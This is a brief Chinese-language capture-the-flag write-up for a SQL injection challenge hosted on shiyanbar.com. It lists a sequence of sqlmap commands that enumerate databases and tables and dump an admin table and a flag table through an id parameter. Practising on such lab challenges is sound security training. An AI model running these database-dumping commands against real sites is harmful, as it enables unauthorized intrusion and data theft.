題目鏈接:http://ctf5.shiyanbar.com/8/index.php?id=1
emmmm。sql注入,先試試sqlmap【我纔不是不會手注呢,好吧,真的不會!!
(1)爆庫: sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs
(2)爆表:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --table -D test
(3)爆字段:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dump -T admin -D test
咦~這不是另外一道題的登錄密碼嗎【手動滑稽
emmmm。重新來~
(4)爆表:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --table -D my_db
emmm。這次應該對了
(5)爆字段:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dump -T thiskey -D my_db
get~ok